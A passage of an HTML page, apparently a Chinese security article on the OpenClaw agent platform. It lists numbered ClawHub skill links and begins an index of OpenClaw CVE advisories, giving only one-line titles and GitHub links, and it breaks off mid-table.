14px;">61</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">whatsapp-qgs</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/whatsapp-qgs" target="_blank">https://www.clawhub.com/skill/whatsapp-qgs</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">62</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">yahoo-finance-5tv</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/yahoo-finance-5tv" target="_blank">https://www.clawhub.com/skill/yahoo-finance-5tv</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">63</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">yahoo-finance-b5p</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/yahoo-finance-b5p" target="_blank">https://www.clawhub.com/skill/yahoo-finance-b5p</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">64</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">yahoo-finance-lpm</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/yahoo-finance-lpm" target="_blank">https://www.clawhub.com/skill/yahoo-finance-lpm</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">65</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">yahoo-finance-t08</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/yahoo-finance-t08" target="_blank">https://www.clawhub.com/skill/yahoo-finance-t08</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">66</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">yahoo-finance-who</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/yahoo-finance-who" target="_blank">https://www.clawhub.com/skill/yahoo-finance-who</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">67</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">youtube-7ze</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/youtube-7ze" target="_blank">https://www.clawhub.com/skill/youtube-7ze</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">68</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">youtube-bgp</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/youtube-bgp" target="_blank">https://www.clawhub.com/skill/youtube-bgp</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">69</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">youtube-jop</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/youtube-jop" target="_blank">https://www.clawhub.com/skill/youtube-jop</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">70</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">youtube-mbo</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/youtube-mbo" target="_blank">https://www.clawhub.com/skill/youtube-mbo</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">71</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">youtube-watchar</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/youtube-watchar" target="_blank">https://www.clawhub.com/skill/youtube-watchar</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">72</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">youtube-watcher-a</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/youtube-watcher-a" target="_blank">https://www.clawhub.com/skill/youtube-watcher-a</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">73</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">youtube-watcher-k</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/youtube-watcher-k" target="_blank">https://www.clawhub.com/skill/youtube-watcher-k</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">74</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">youtube-watcher-u</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/youtube-watcher-u" target="_blank">https://www.clawhub.com/skill/youtube-watcher-u</a></span></span></span></p></td></tr></tbody></table><h3 style="text-align: left;line-height: 1.7;margin: 16px 0pt 8px;"><span style="font-size: 14pt;font-weight: bold;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 16px;color: rgb(0, 82, 255);">CVE 漏洞修复索引表</span></span></span></h3><table style="border-collapse:collapse;border:none;table-layout:fixed;mso-table-layout-alt:fixed;width:544px;"><tbody><tr style="height:27px;"><td data-colwidth="141" width="139" style="box-sizing:border-box;vertical-align:middle;padding:10px;border-width:0.833333px;border-style:solid;border-color:rgb(239, 239, 239);background-color:#ebe9e9;"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">CVE 编号</span></span></span></p></td><td data-colwidth="211" width="245" style="box-sizing:border-box;vertical-align:middle;padding:10px;border-width:0.833333px;border-style:solid;border-color:rgb(239, 239, 239);background-color:#ebe9e9;"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">描述</span></span></span></p></td><td data-colwidth="192" width="235" style="box-sizing:border-box;vertical-align:middle;padding:10px;border-width:0.833333px;border-style:solid;border-color:rgb(239, 239, 239);background-color:#ebe9e9;"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#333333;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">引用</span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="141" width="139" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"></td><td data-colwidth="211" width="245" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">1-Click RCE via Authentication Token Exfiltration From gatewayUrl</span></span></span></p></td><td data-colwidth="192" width="235" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#333333;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://github.com/openclaw/openclaw/security/advisories/GHSA-g8p2-7wf7-98mq" target="_blank">https://github.com/openclaw/openclaw/security/advisories/GHSA-g8p2-7wf7-98mq</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="141" width="139" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">CVE-2026-25157</span></span></span></p></td><td data-colwidth="211" width="245" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">OS Command Injection via Project Root Path in sshNodeCommand</span></span></span></p></td><td data-colwidth="192" width="235" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#333333;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://github.com/openclaw/openclaw/security/advisories/GHSA-q284-4pvr-m585" target="_blank">https://github.com/openclaw/openclaw/security/advisories/GHSA-q284-4pvr-m585</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="141" width="139" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">CVE-2026-24763</span></span></span></p></td><td data-colwidth="211" width="245" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">Command Injection in Clawdbot Docker Execution via PATH Environment Variable</span></span></span></p></td><td data-colwidth="192" width="235" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">  <a href="https://github.com/openclaw/openclaw/security/advisories/GHSA-mc68-q9jw-2h3v" target="_blank">https://github.com/openclaw/openclaw/security/advisories/GHSA-mc68-q9jw-2h3v</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="141" width="139" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 